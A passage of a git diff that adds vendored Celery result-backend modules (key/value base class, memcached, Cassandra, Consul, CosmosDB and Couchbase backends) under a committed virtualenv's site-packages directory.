+class BaseKeyValueStoreBackend(Backend): + key_t = ensure_bytes + task_keyprefix = 'celery-task-meta-' + group_keyprefix = 'celery-taskset-meta-' + chord_keyprefix = 'chord-unlock-' + implements_incr = False + + def __init__(self, *args, **kwargs): + if hasattr(self.key_t, '__func__'): # pragma: no cover + self.key_t = self.key_t.__func__ # remove binding + super().__init__(*args, **kwargs) + self._add_global_keyprefix() + self._encode_prefixes() + if self.implements_incr: + self.apply_chord = self._apply_chord_incr + + def _add_global_keyprefix(self): + """ + This method prepends the global keyprefix to the existing keyprefixes. + + This method checks if a global keyprefix is configured in `result_backend_transport_options` using the + `global_keyprefix` key. If so, then it is prepended to the task, group and chord key prefixes. 
+ """ + global_keyprefix = self.app.conf.get('result_backend_transport_options', {}).get("global_keyprefix", None) + if global_keyprefix: + self.task_keyprefix = f"{global_keyprefix}_{self.task_keyprefix}" + self.group_keyprefix = f"{global_keyprefix}_{self.group_keyprefix}" + self.chord_keyprefix = f"{global_keyprefix}_{self.chord_keyprefix}" + + def _encode_prefixes(self): + self.task_keyprefix = self.key_t(self.task_keyprefix) + self.group_keyprefix = self.key_t(self.group_keyprefix) + self.chord_keyprefix = self.key_t(self.chord_keyprefix) + + def get(self, key): + raise NotImplementedError('Must implement the get method.') + + def mget(self, keys): + raise NotImplementedError('Does not support get_many') + + def _set_with_state(self, key, value, state): + return self.set(key, value) + + def set(self, key, value): + raise NotImplementedError('Must implement the set method.') + + def delete(self, key): + raise NotImplementedError('Must implement the delete method') + + def incr(self, key): + raise NotImplementedError('Does not implement incr') + + def expire(self, key, value): + pass + + def get_key_for_task(self, task_id, key=''): + """Get the cache key for a task by id.""" + if not task_id: + raise ValueError(f'task_id must not be empty. Got {task_id} instead.') + return self._get_key_for(self.task_keyprefix, task_id, key) + + def get_key_for_group(self, group_id, key=''): + """Get the cache key for a group by id.""" + if not group_id: + raise ValueError(f'group_id must not be empty. Got {group_id} instead.') + return self._get_key_for(self.group_keyprefix, group_id, key) + + def get_key_for_chord(self, group_id, key=''): + """Get the cache key for the chord waiting on group with given id.""" + if not group_id: + raise ValueError(f'group_id must not be empty. Got {group_id} instead.') + return self._get_key_for(self.chord_keyprefix, group_id, key) + + def _get_key_for(self, prefix, id, key=''): + key_t = self.key_t + + return key_t('').join([ + prefix, key_t(id), key_t(key), + ]) + + def _strip_prefix(self, key): + """Take bytes: emit string.""" + key = self.key_t(key) + for prefix in self.task_keyprefix, self.group_keyprefix: + if key.startswith(prefix): + return bytes_to_str(key[len(prefix):]) + return bytes_to_str(key) + + def _filter_ready(self, values, READY_STATES=states.READY_STATES): + for k, value in values: + if value is not None: + value = self.decode_result(value) + if value['status'] in READY_STATES: + yield k, value + + def _mget_to_results(self, values, keys, READY_STATES=states.READY_STATES): + if hasattr(values, 'items'): + # client returns dict so mapping preserved. + return { + self._strip_prefix(k): v + for k, v in self._filter_ready(values.items(), READY_STATES) + } + else: + # client returns list so need to recreate mapping. 
+ return { + bytes_to_str(keys[i]): v + for i, v in self._filter_ready(enumerate(values), READY_STATES) + } + + def get_many(self, task_ids, timeout=None, interval=0.5, no_ack=True, + on_message=None, on_interval=None, max_iterations=None, + READY_STATES=states.READY_STATES): + interval = 0.5 if interval is None else interval + ids = task_ids if isinstance(task_ids, set) else set(task_ids) + cached_ids = set() + cache = self._cache + for task_id in ids: + try: + cached = cache[task_id] + except KeyError: + pass + else: + if cached['status'] in READY_STATES: + yield bytes_to_str(task_id), cached + cached_ids.add(task_id) + + ids.difference_update(cached_ids) + iterations = 0 + while ids: + keys = list(ids) + r = self._mget_to_results(self.mget([self.get_key_for_task(k) + for k in keys]), keys, READY_STATES) + cache.update(r) + ids.difference_update({bytes_to_str(v) for v in r}) + for key, value in r.items(): + if on_message is not None: + on_message(value) + yield bytes_to_str(key), value + if timeout and iterations * interval >= timeout: + raise TimeoutError(f'Operation timed out ({timeout})') + if on_interval: + on_interval() + time.sleep(interval) # don't busy loop. + iterations += 1 + if max_iterations and iterations >= max_iterations: + break + + def _forget(self, task_id): + self.delete(self.get_key_for_task(task_id)) + + def _store_result(self, task_id, result, state, + traceback=None, request=None, **kwargs): + meta = self._get_result_meta(result=result, state=state, + traceback=traceback, request=request) + meta['task_id'] = bytes_to_str(task_id) + + # Retrieve metadata from the backend, if the status + # is a success then we ignore any following update to the state. + # This solves a task deduplication issue because of network + # partitioning or lost workers. This issue involved a race condition + # making a lost task overwrite the last successful result in the + # result backend. + current_meta = self._get_task_meta_for(task_id) + + if current_meta['status'] == states.SUCCESS: + return result + + try: + self._set_with_state(self.get_key_for_task(task_id), self.encode(meta), state) + except BackendStoreError as ex: + raise BackendStoreError(str(ex), state=state, task_id=task_id) from ex + + return result + + def _save_group(self, group_id, result): + self._set_with_state(self.get_key_for_group(group_id), + self.encode({'result': result.as_tuple()}), states.SUCCESS) + return result + + def _delete_group(self, group_id): + self.delete(self.get_key_for_group(group_id)) + + def _get_task_meta_for(self, task_id): + """Get task meta-data for a task by id.""" + meta = self.get(self.get_key_for_task(task_id)) + if not meta: + return {'status': states.PENDING, 'result': None} + return self.decode_result(meta) + + def _restore_group(self, group_id): + """Get task meta-data for a task by id.""" + meta = self.get(self.get_key_for_group(group_id)) + # previously this was always pickled, but later this + # was extended to support other serializers, so the + # structure is kind of weird. 
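# (Concretely, _save_group() above stores self.encode({'result':
#  result.as_tuple()}), so after decoding, meta['result'] still holds the
#  tuple form and has to be rebuilt into a real result object below via
#  result_from_tuple().)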
+ if meta: + meta = self.decode(meta) + result = meta['result'] + meta['result'] = result_from_tuple(result, self.app) + return meta + + def _apply_chord_incr(self, header_result_args, body, **kwargs): + self.ensure_chords_allowed() + header_result = self.app.GroupResult(*header_result_args) + header_result.save(backend=self) + + def on_chord_part_return(self, request, state, result, **kwargs): + if not self.implements_incr: + return + app = self.app + gid = request.group + if not gid: + return + key = self.get_key_for_chord(gid) + try: + deps = GroupResult.restore(gid, backend=self) + except Exception as exc: # pylint: disable=broad-except + callback = maybe_signature(request.chord, app=app) + logger.exception('Chord %r raised: %r', gid, exc) + return self.chord_error_from_stack( + callback, + ChordError(f'Cannot restore group: {exc!r}'), + ) + if deps is None: + try: + raise ValueError(gid) + except ValueError as exc: + callback = maybe_signature(request.chord, app=app) + logger.exception('Chord callback %r raised: %r', gid, exc) + return self.chord_error_from_stack( + callback, + ChordError(f'GroupResult {gid} no longer exists'), + ) + val = self.incr(key) + # Set the chord size to the value defined in the request, or fall back + # to the number of dependencies we can see from the restored result + size = request.chord.get("chord_size") + if size is None: + size = len(deps) + if val > size: # pragma: no cover + logger.warning('Chord counter incremented too many times for %r', + gid) + elif val == size: + callback = maybe_signature(request.chord, app=app) + j = deps.join_native if deps.supports_native_join else deps.join + try: + with allow_join_result(): + ret = j( + timeout=app.conf.result_chord_join_timeout, + propagate=True) + except Exception as exc: # pylint: disable=broad-except + try: + culprit = next(deps._failed_join_report()) + reason = 'Dependency {0.id} raised {1!r}'.format( + culprit, exc, + ) + except StopIteration: + reason = repr(exc) + + logger.exception('Chord %r raised: %r', gid, reason) + self.chord_error_from_stack(callback, ChordError(reason)) + else: + try: + callback.delay(ret) + except Exception as exc: # pylint: disable=broad-except + logger.exception('Chord %r raised: %r', gid, exc) + self.chord_error_from_stack( + callback, + ChordError(f'Callback error: {exc!r}'), + ) + finally: + deps.delete() + self.client.delete(key) + else: + self.expire(key, self.expires) + + +class KeyValueStoreBackend(BaseKeyValueStoreBackend, SyncBackendMixin): + """Result backend base class for key/value stores.""" + + +class DisabledBackend(BaseBackend): + """Dummy result backend.""" + + _cache = {} # need this attribute to reset cache in tests. 
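# Example (sketch): an application falls back to this backend when no result
# backend is configured, so reading a result fails loudly rather than
# hanging. The broker URL and task name below are purely illustrative:
#
#     from celery import Celery
#     app = Celery('proj', broker='amqp://')      # no result_backend set
#     res = app.send_task('proj.add', args=(2, 2))
#     res.get()   # raises NotImplementedError via _is_disabled()/E_NO_BACKEND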
+ + def store_result(self, *args, **kwargs): + pass + + def ensure_chords_allowed(self): + raise NotImplementedError(E_CHORD_NO_BACKEND.strip()) + + def _is_disabled(self, *args, **kwargs): + raise NotImplementedError(E_NO_BACKEND.strip()) + + def as_uri(self, *args, **kwargs): + return 'disabled://' + + get_state = get_status = get_result = get_traceback = _is_disabled + get_task_meta_for = wait_for = get_many = _is_disabled diff --git a/env/Lib/site-packages/celery/backends/cache.py b/env/Lib/site-packages/celery/backends/cache.py new file mode 100644 index 00000000..ad79383c --- /dev/null +++ b/env/Lib/site-packages/celery/backends/cache.py @@ -0,0 +1,163 @@ +"""Memcached and in-memory cache result backend.""" +from kombu.utils.encoding import bytes_to_str, ensure_bytes +from kombu.utils.objects import cached_property + +from celery.exceptions import ImproperlyConfigured +from celery.utils.functional import LRUCache + +from .base import KeyValueStoreBackend + +__all__ = ('CacheBackend',) + +_imp = [None] + +REQUIRES_BACKEND = """\ +The Memcached backend requires either pylibmc or python-memcached.\ +""" + +UNKNOWN_BACKEND = """\ +The cache backend {0!r} is unknown, +Please use one of the following backends instead: {1}\ +""" + +# Global shared in-memory cache for in-memory cache client +# This is to share cache between threads +_DUMMY_CLIENT_CACHE = LRUCache(limit=5000) + + +def import_best_memcache(): + if _imp[0] is None: + is_pylibmc, memcache_key_t = False, bytes_to_str + try: + import pylibmc as memcache + is_pylibmc = True + except ImportError: + try: + import memcache + except ImportError: + raise ImproperlyConfigured(REQUIRES_BACKEND) + _imp[0] = (is_pylibmc, memcache, memcache_key_t) + return _imp[0] + + +def get_best_memcache(*args, **kwargs): + # pylint: disable=unpacking-non-sequence + # This is most definitely a sequence, but pylint thinks it's not. 
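# Example (sketch): configuration that routes results through this module;
# the server address and client options are illustrative (the
# 'cache+memcached://' form resolves to the CacheBackend defined below):
#
#     app.conf.result_backend = 'cache+memcached://127.0.0.1:11211/'
#     app.conf.cache_backend_options = {'behaviors': {'tcp_nodelay': True}}
#
# When only python-memcached is installed, the wrapper below drops the
# pylibmc-only 'behaviors' argument before constructing the client.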
+ is_pylibmc, memcache, key_t = import_best_memcache() + Client = _Client = memcache.Client + + if not is_pylibmc: + def Client(*args, **kwargs): # noqa: F811 + kwargs.pop('behaviors', None) + return _Client(*args, **kwargs) + + return Client, key_t + + +class DummyClient: + + def __init__(self, *args, **kwargs): + self.cache = _DUMMY_CLIENT_CACHE + + def get(self, key, *args, **kwargs): + return self.cache.get(key) + + def get_multi(self, keys): + cache = self.cache + return {k: cache[k] for k in keys if k in cache} + + def set(self, key, value, *args, **kwargs): + self.cache[key] = value + + def delete(self, key, *args, **kwargs): + self.cache.pop(key, None) + + def incr(self, key, delta=1): + return self.cache.incr(key, delta) + + def touch(self, key, expire): + pass + + +backends = { + 'memcache': get_best_memcache, + 'memcached': get_best_memcache, + 'pylibmc': get_best_memcache, + 'memory': lambda: (DummyClient, ensure_bytes), +} + + +class CacheBackend(KeyValueStoreBackend): + """Cache result backend.""" + + servers = None + supports_autoexpire = True + supports_native_join = True + implements_incr = True + + def __init__(self, app, expires=None, backend=None, + options=None, url=None, **kwargs): + options = {} if not options else options + super().__init__(app, **kwargs) + self.url = url + + self.options = dict(self.app.conf.cache_backend_options, + **options) + + self.backend = url or backend or self.app.conf.cache_backend + if self.backend: + self.backend, _, servers = self.backend.partition('://') + self.servers = servers.rstrip('/').split(';') + self.expires = self.prepare_expires(expires, type=int) + try: + self.Client, self.key_t = backends[self.backend]() + except KeyError: + raise ImproperlyConfigured(UNKNOWN_BACKEND.format( + self.backend, ', '.join(backends))) + self._encode_prefixes() # rencode the keyprefixes + + def get(self, key): + return self.client.get(key) + + def mget(self, keys): + return self.client.get_multi(keys) + + def set(self, key, value): + return self.client.set(key, value, self.expires) + + def delete(self, key): + return self.client.delete(key) + + def _apply_chord_incr(self, header_result_args, body, **kwargs): + chord_key = self.get_key_for_chord(header_result_args[0]) + self.client.set(chord_key, 0, time=self.expires) + return super()._apply_chord_incr( + header_result_args, body, **kwargs) + + def incr(self, key): + return self.client.incr(key) + + def expire(self, key, value): + return self.client.touch(key, value) + + @cached_property + def client(self): + return self.Client(self.servers, **self.options) + + def __reduce__(self, args=(), kwargs=None): + kwargs = {} if not kwargs else kwargs + servers = ';'.join(self.servers) + backend = f'{self.backend}://{servers}/' + kwargs.update( + {'backend': backend, + 'expires': self.expires, + 'options': self.options}) + return super().__reduce__(args, kwargs) + + def as_uri(self, *args, **kwargs): + """Return the backend as an URI. + + This properly handles the case of multiple servers. 
+ """ + servers = ';'.join(self.servers) + return f'{self.backend}://{servers}/' diff --git a/env/Lib/site-packages/celery/backends/cassandra.py b/env/Lib/site-packages/celery/backends/cassandra.py new file mode 100644 index 00000000..0eb37f31 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/cassandra.py @@ -0,0 +1,256 @@ +"""Apache Cassandra result store backend using the DataStax driver.""" +import threading + +from celery import states +from celery.exceptions import ImproperlyConfigured +from celery.utils.log import get_logger + +from .base import BaseBackend + +try: # pragma: no cover + import cassandra + import cassandra.auth + import cassandra.cluster + import cassandra.query +except ImportError: + cassandra = None + + +__all__ = ('CassandraBackend',) + +logger = get_logger(__name__) + +E_NO_CASSANDRA = """ +You need to install the cassandra-driver library to +use the Cassandra backend. See https://github.com/datastax/python-driver +""" + +E_NO_SUCH_CASSANDRA_AUTH_PROVIDER = """ +CASSANDRA_AUTH_PROVIDER you provided is not a valid auth_provider class. +See https://datastax.github.io/python-driver/api/cassandra/auth.html. +""" + +E_CASSANDRA_MISCONFIGURED = 'Cassandra backend improperly configured.' + +E_CASSANDRA_NOT_CONFIGURED = 'Cassandra backend not configured.' + +Q_INSERT_RESULT = """ +INSERT INTO {table} ( + task_id, status, result, date_done, traceback, children) VALUES ( + %s, %s, %s, %s, %s, %s) {expires}; +""" + +Q_SELECT_RESULT = """ +SELECT status, result, date_done, traceback, children +FROM {table} +WHERE task_id=%s +LIMIT 1 +""" + +Q_CREATE_RESULT_TABLE = """ +CREATE TABLE {table} ( + task_id text, + status text, + result blob, + date_done timestamp, + traceback blob, + children blob, + PRIMARY KEY ((task_id), date_done) +) WITH CLUSTERING ORDER BY (date_done DESC); +""" + +Q_EXPIRES = """ + USING TTL {0} +""" + + +def buf_t(x): + return bytes(x, 'utf8') + + +class CassandraBackend(BaseBackend): + """Cassandra/AstraDB backend utilizing DataStax driver. + + Raises: + celery.exceptions.ImproperlyConfigured: + if module :pypi:`cassandra-driver` is not available, + or not-exactly-one of the :setting:`cassandra_servers` and + the :setting:`cassandra_secure_bundle_path` settings is set. + """ + + #: List of Cassandra servers with format: ``hostname``. + servers = None + #: Location of the secure connect bundle zipfile (absolute path). + bundle_path = None + + supports_autoexpire = True # autoexpire supported via entry_ttl + + def __init__(self, servers=None, keyspace=None, table=None, entry_ttl=None, + port=9042, bundle_path=None, **kwargs): + super().__init__(**kwargs) + + if not cassandra: + raise ImproperlyConfigured(E_NO_CASSANDRA) + + conf = self.app.conf + self.servers = servers or conf.get('cassandra_servers', None) + self.bundle_path = bundle_path or conf.get( + 'cassandra_secure_bundle_path', None) + self.port = port or conf.get('cassandra_port', None) + self.keyspace = keyspace or conf.get('cassandra_keyspace', None) + self.table = table or conf.get('cassandra_table', None) + self.cassandra_options = conf.get('cassandra_options', {}) + + # either servers or bundle path must be provided... 
+ db_directions = self.servers or self.bundle_path + if not db_directions or not self.keyspace or not self.table: + raise ImproperlyConfigured(E_CASSANDRA_NOT_CONFIGURED) + # ...but not both: + if self.servers and self.bundle_path: + raise ImproperlyConfigured(E_CASSANDRA_MISCONFIGURED) + + expires = entry_ttl or conf.get('cassandra_entry_ttl', None) + + self.cqlexpires = ( + Q_EXPIRES.format(expires) if expires is not None else '') + + read_cons = conf.get('cassandra_read_consistency') or 'LOCAL_QUORUM' + write_cons = conf.get('cassandra_write_consistency') or 'LOCAL_QUORUM' + + self.read_consistency = getattr( + cassandra.ConsistencyLevel, read_cons, + cassandra.ConsistencyLevel.LOCAL_QUORUM) + self.write_consistency = getattr( + cassandra.ConsistencyLevel, write_cons, + cassandra.ConsistencyLevel.LOCAL_QUORUM) + + self.auth_provider = None + auth_provider = conf.get('cassandra_auth_provider', None) + auth_kwargs = conf.get('cassandra_auth_kwargs', None) + if auth_provider and auth_kwargs: + auth_provider_class = getattr(cassandra.auth, auth_provider, None) + if not auth_provider_class: + raise ImproperlyConfigured(E_NO_SUCH_CASSANDRA_AUTH_PROVIDER) + self.auth_provider = auth_provider_class(**auth_kwargs) + + self._cluster = None + self._session = None + self._write_stmt = None + self._read_stmt = None + self._lock = threading.RLock() + + def _get_connection(self, write=False): + """Prepare the connection for action. + + Arguments: + write (bool): are we a writer? + """ + if self._session is not None: + return + self._lock.acquire() + try: + if self._session is not None: + return + # using either 'servers' or 'bundle_path' here: + if self.servers: + self._cluster = cassandra.cluster.Cluster( + self.servers, port=self.port, + auth_provider=self.auth_provider, + **self.cassandra_options) + else: + # 'bundle_path' is guaranteed to be set + self._cluster = cassandra.cluster.Cluster( + cloud={ + 'secure_connect_bundle': self.bundle_path, + }, + auth_provider=self.auth_provider, + **self.cassandra_options) + self._session = self._cluster.connect(self.keyspace) + + # We're forced to do concatenation below, as formatting would + # blow up on superficial %s that'll be processed by Cassandra + self._write_stmt = cassandra.query.SimpleStatement( + Q_INSERT_RESULT.format( + table=self.table, expires=self.cqlexpires), + ) + self._write_stmt.consistency_level = self.write_consistency + + self._read_stmt = cassandra.query.SimpleStatement( + Q_SELECT_RESULT.format(table=self.table), + ) + self._read_stmt.consistency_level = self.read_consistency + + if write: + # Only possible writers "workers" are allowed to issue + # CREATE TABLE. This is to prevent conflicting situations + # where both task-creator and task-executor would issue it + # at the same time. + + # Anyway; if you're doing anything critical, you should + # have created this table in advance, in which case + # this query will be a no-op (AlreadyExists) + make_stmt = cassandra.query.SimpleStatement( + Q_CREATE_RESULT_TABLE.format(table=self.table), + ) + make_stmt.consistency_level = self.write_consistency + + try: + self._session.execute(make_stmt) + except cassandra.AlreadyExists: + pass + + except cassandra.OperationTimedOut: + # a heavily loaded or gone Cassandra cluster failed to respond. 
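# (OperationTimedOut is the driver's client-side timeout; tearing everything
#  down here means the next _get_connection() call starts from scratch with
#  a fresh Cluster instead of reusing a half-initialized one.)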
+ # leave this class in a consistent state + if self._cluster is not None: + self._cluster.shutdown() # also shuts down _session + + self._cluster = None + self._session = None + raise # we did fail after all - reraise + finally: + self._lock.release() + + def _store_result(self, task_id, result, state, + traceback=None, request=None, **kwargs): + """Store return value and state of an executed task.""" + self._get_connection(write=True) + + self._session.execute(self._write_stmt, ( + task_id, + state, + buf_t(self.encode(result)), + self.app.now(), + buf_t(self.encode(traceback)), + buf_t(self.encode(self.current_task_children(request))) + )) + + def as_uri(self, include_password=True): + return 'cassandra://' + + def _get_task_meta_for(self, task_id): + """Get task meta-data for a task by id.""" + self._get_connection() + + res = self._session.execute(self._read_stmt, (task_id, )).one() + if not res: + return {'status': states.PENDING, 'result': None} + + status, result, date_done, traceback, children = res + + return self.meta_from_decoded({ + 'task_id': task_id, + 'status': status, + 'result': self.decode(result), + 'date_done': date_done, + 'traceback': self.decode(traceback), + 'children': self.decode(children), + }) + + def __reduce__(self, args=(), kwargs=None): + kwargs = {} if not kwargs else kwargs + kwargs.update( + {'servers': self.servers, + 'keyspace': self.keyspace, + 'table': self.table}) + return super().__reduce__(args, kwargs) diff --git a/env/Lib/site-packages/celery/backends/consul.py b/env/Lib/site-packages/celery/backends/consul.py new file mode 100644 index 00000000..a4ab1484 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/consul.py @@ -0,0 +1,116 @@ +"""Consul result store backend. + +- :class:`ConsulBackend` implements KeyValueStoreBackend to store results + in the key-value store of Consul. +""" +from kombu.utils.encoding import bytes_to_str +from kombu.utils.url import parse_url + +from celery.backends.base import KeyValueStoreBackend +from celery.exceptions import ImproperlyConfigured +from celery.utils.log import get_logger + +try: + import consul +except ImportError: + consul = None + +logger = get_logger(__name__) + +__all__ = ('ConsulBackend',) + +CONSUL_MISSING = """\ +You need to install the python-consul library in order to use \ +the Consul result store backend.""" + + +class ConsulBackend(KeyValueStoreBackend): + """Consul.io K/V store backend for Celery.""" + + consul = consul + + supports_autoexpire = True + + consistency = 'consistent' + path = None + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + + if self.consul is None: + raise ImproperlyConfigured(CONSUL_MISSING) + # + # By default, for correctness, we use a client connection per + # operation. If set, self.one_client will be used for all operations. + # This provides for the original behaviour to be selected, and is + # also convenient for mocking in the unit tests. + # + self.one_client = None + self._init_from_params(**parse_url(self.url)) + + def _init_from_params(self, hostname, port, virtual_host, **params): + logger.debug('Setting on Consul client to connect to %s:%d', + hostname, port) + self.path = virtual_host + self.hostname = hostname + self.port = port + # + # Optionally, allow a single client connection to be used to reduce + # the connection load on Consul by adding a "one_client=1" parameter + # to the URL. 
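# Example (sketch): the two URL forms that reach this branch; host and port
# are illustrative:
#
#     result_backend = 'consul://localhost:8500/'                 # new client per operation
#     result_backend = 'consul://localhost:8500/?one_client=1'    # one shared client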
+ # + if params.get('one_client', None): + self.one_client = self.client() + + def client(self): + return self.one_client or consul.Consul(host=self.hostname, + port=self.port, + consistency=self.consistency) + + def _key_to_consul_key(self, key): + key = bytes_to_str(key) + return key if self.path is None else f'{self.path}/{key}' + + def get(self, key): + key = self._key_to_consul_key(key) + logger.debug('Trying to fetch key %s from Consul', key) + try: + _, data = self.client().kv.get(key) + return data['Value'] + except TypeError: + pass + + def mget(self, keys): + for key in keys: + yield self.get(key) + + def set(self, key, value): + """Set a key in Consul. + + Before creating the key it will create a session inside Consul + where it creates a session with a TTL + + The key created afterwards will reference to the session's ID. + + If the session expires it will remove the key so that results + can auto expire from the K/V store + """ + session_name = bytes_to_str(key) + + key = self._key_to_consul_key(key) + + logger.debug('Trying to create Consul session %s with TTL %d', + session_name, self.expires) + client = self.client() + session_id = client.session.create(name=session_name, + behavior='delete', + ttl=self.expires) + logger.debug('Created Consul session %s', session_id) + + logger.debug('Writing key %s to Consul', key) + return client.kv.put(key=key, value=value, acquire=session_id) + + def delete(self, key): + key = self._key_to_consul_key(key) + logger.debug('Removing key %s from Consul', key) + return self.client().kv.delete(key) diff --git a/env/Lib/site-packages/celery/backends/cosmosdbsql.py b/env/Lib/site-packages/celery/backends/cosmosdbsql.py new file mode 100644 index 00000000..e32b13f2 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/cosmosdbsql.py @@ -0,0 +1,218 @@ +"""The CosmosDB/SQL backend for Celery (experimental).""" +from kombu.utils import cached_property +from kombu.utils.encoding import bytes_to_str +from kombu.utils.url import _parse_url + +from celery.exceptions import ImproperlyConfigured +from celery.utils.log import get_logger + +from .base import KeyValueStoreBackend + +try: + import pydocumentdb + from pydocumentdb.document_client import DocumentClient + from pydocumentdb.documents import ConnectionPolicy, ConsistencyLevel, PartitionKind + from pydocumentdb.errors import HTTPFailure + from pydocumentdb.retry_options import RetryOptions +except ImportError: + pydocumentdb = DocumentClient = ConsistencyLevel = PartitionKind = \ + HTTPFailure = ConnectionPolicy = RetryOptions = None + +__all__ = ("CosmosDBSQLBackend",) + + +ERROR_NOT_FOUND = 404 +ERROR_EXISTS = 409 + +LOGGER = get_logger(__name__) + + +class CosmosDBSQLBackend(KeyValueStoreBackend): + """CosmosDB/SQL backend for Celery.""" + + def __init__(self, + url=None, + database_name=None, + collection_name=None, + consistency_level=None, + max_retry_attempts=None, + max_retry_wait_time=None, + *args, + **kwargs): + super().__init__(*args, **kwargs) + + if pydocumentdb is None: + raise ImproperlyConfigured( + "You need to install the pydocumentdb library to use the " + "CosmosDB backend.") + + conf = self.app.conf + + self._endpoint, self._key = self._parse_url(url) + + self._database_name = ( + database_name or + conf["cosmosdbsql_database_name"]) + + self._collection_name = ( + collection_name or + conf["cosmosdbsql_collection_name"]) + + try: + self._consistency_level = getattr( + ConsistencyLevel, + consistency_level or + conf["cosmosdbsql_consistency_level"]) + except 
AttributeError: + raise ImproperlyConfigured("Unknown CosmosDB consistency level") + + self._max_retry_attempts = ( + max_retry_attempts or + conf["cosmosdbsql_max_retry_attempts"]) + + self._max_retry_wait_time = ( + max_retry_wait_time or + conf["cosmosdbsql_max_retry_wait_time"]) + + @classmethod + def _parse_url(cls, url): + _, host, port, _, password, _, _ = _parse_url(url) + + if not host or not password: + raise ImproperlyConfigured("Invalid URL") + + if not port: + port = 443 + + scheme = "https" if port == 443 else "http" + endpoint = f"{scheme}://{host}:{port}" + return endpoint, password + + @cached_property + def _client(self): + """Return the CosmosDB/SQL client. + + If this is the first call to the property, the client is created and + the database and collection are initialized if they don't yet exist. + + """ + connection_policy = ConnectionPolicy() + connection_policy.RetryOptions = RetryOptions( + max_retry_attempt_count=self._max_retry_attempts, + max_wait_time_in_seconds=self._max_retry_wait_time) + + client = DocumentClient( + self._endpoint, + {"masterKey": self._key}, + connection_policy=connection_policy, + consistency_level=self._consistency_level) + + self._create_database_if_not_exists(client) + self._create_collection_if_not_exists(client) + + return client + + def _create_database_if_not_exists(self, client): + try: + client.CreateDatabase({"id": self._database_name}) + except HTTPFailure as ex: + if ex.status_code != ERROR_EXISTS: + raise + else: + LOGGER.info("Created CosmosDB database %s", + self._database_name) + + def _create_collection_if_not_exists(self, client): + try: + client.CreateCollection( + self._database_link, + {"id": self._collection_name, + "partitionKey": {"paths": ["/id"], + "kind": PartitionKind.Hash}}) + except HTTPFailure as ex: + if ex.status_code != ERROR_EXISTS: + raise + else: + LOGGER.info("Created CosmosDB collection %s/%s", + self._database_name, self._collection_name) + + @cached_property + def _database_link(self): + return "dbs/" + self._database_name + + @cached_property + def _collection_link(self): + return self._database_link + "/colls/" + self._collection_name + + def _get_document_link(self, key): + return self._collection_link + "/docs/" + key + + @classmethod + def _get_partition_key(cls, key): + if not key or key.isspace(): + raise ValueError("Key cannot be none, empty or whitespace.") + + return {"partitionKey": key} + + def get(self, key): + """Read the value stored at the given key. + + Args: + key: The key for which to read the value. + + """ + key = bytes_to_str(key) + LOGGER.debug("Getting CosmosDB document %s/%s/%s", + self._database_name, self._collection_name, key) + + try: + document = self._client.ReadDocument( + self._get_document_link(key), + self._get_partition_key(key)) + except HTTPFailure as ex: + if ex.status_code != ERROR_NOT_FOUND: + raise + return None + else: + return document.get("value") + + def set(self, key, value): + """Store a value for a given key. + + Args: + key: The key at which to store the value. + value: The value to store. + + """ + key = bytes_to_str(key) + LOGGER.debug("Creating CosmosDB document %s/%s/%s", + self._database_name, self._collection_name, key) + + self._client.CreateDocument( + self._collection_link, + {"id": key, "value": value}, + self._get_partition_key(key)) + + def mget(self, keys): + """Read all the values for the provided keys. + + Args: + keys: The list of keys to read. 
+ + """ + return [self.get(key) for key in keys] + + def delete(self, key): + """Delete the value at a given key. + + Args: + key: The key of the value to delete. + + """ + key = bytes_to_str(key) + LOGGER.debug("Deleting CosmosDB document %s/%s/%s", + self._database_name, self._collection_name, key) + + self._client.DeleteDocument( + self._get_document_link(key), + self._get_partition_key(key)) diff --git a/env/Lib/site-packages/celery/backends/couchbase.py b/env/Lib/site-packages/celery/backends/couchbase.py new file mode 100644 index 00000000..f01cb958 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/couchbase.py @@ -0,0 +1,114 @@ +"""Couchbase result store backend.""" + +from kombu.utils.url import _parse_url + +from celery.exceptions import ImproperlyConfigured + +from .base import KeyValueStoreBackend + +try: + from couchbase.auth import PasswordAuthenticator + from couchbase.cluster import Cluster +except ImportError: + Cluster = PasswordAuthenticator = None + +try: + from couchbase_core._libcouchbase import FMT_AUTO +except ImportError: + FMT_AUTO = None + +__all__ = ('CouchbaseBackend',) + + +class CouchbaseBackend(KeyValueStoreBackend): + """Couchbase backend. + + Raises: + celery.exceptions.ImproperlyConfigured: + if module :pypi:`couchbase` is not available. + """ + + bucket = 'default' + host = 'localhost' + port = 8091 + username = None + password = None + quiet = False + supports_autoexpire = True + + timeout = 2.5 + + # Use str as couchbase key not bytes + key_t = str + + def __init__(self, url=None, *args, **kwargs): + kwargs.setdefault('expires_type', int) + super().__init__(*args, **kwargs) + self.url = url + + if Cluster is None: + raise ImproperlyConfigured( + 'You need to install the couchbase library to use the ' + 'Couchbase backend.', + ) + + uhost = uport = uname = upass = ubucket = None + if url: + _, uhost, uport, uname, upass, ubucket, _ = _parse_url(url) + ubucket = ubucket.strip('/') if ubucket else None + + config = self.app.conf.get('couchbase_backend_settings', None) + if config is not None: + if not isinstance(config, dict): + raise ImproperlyConfigured( + 'Couchbase backend settings should be grouped in a dict', + ) + else: + config = {} + + self.host = uhost or config.get('host', self.host) + self.port = int(uport or config.get('port', self.port)) + self.bucket = ubucket or config.get('bucket', self.bucket) + self.username = uname or config.get('username', self.username) + self.password = upass or config.get('password', self.password) + + self._connection = None + + def _get_connection(self): + """Connect to the Couchbase server.""" + if self._connection is None: + if self.host and self.port: + uri = f"couchbase://{self.host}:{self.port}" + else: + uri = f"couchbase://{self.host}" + if self.username and self.password: + opt = PasswordAuthenticator(self.username, self.password) + else: + opt = None + + cluster = Cluster(uri, opt) + + bucket = cluster.bucket(self.bucket) + + self._connection = bucket.default_collection() + return self._connection + + @property + def connection(self): + return self._get_connection() + + def get(self, key): + return self.connection.get(key).content + + def set(self, key, value): + # Since 4.0.0 value is JSONType in couchbase lib, so parameter format isn't needed + if FMT_AUTO is not None: + self.connection.upsert(key, value, ttl=self.expires, format=FMT_AUTO) + else: + self.connection.upsert(key, value, ttl=self.expires) + + def mget(self, keys): + return self.connection.get_multi(keys) + + def delete(self, key): + 
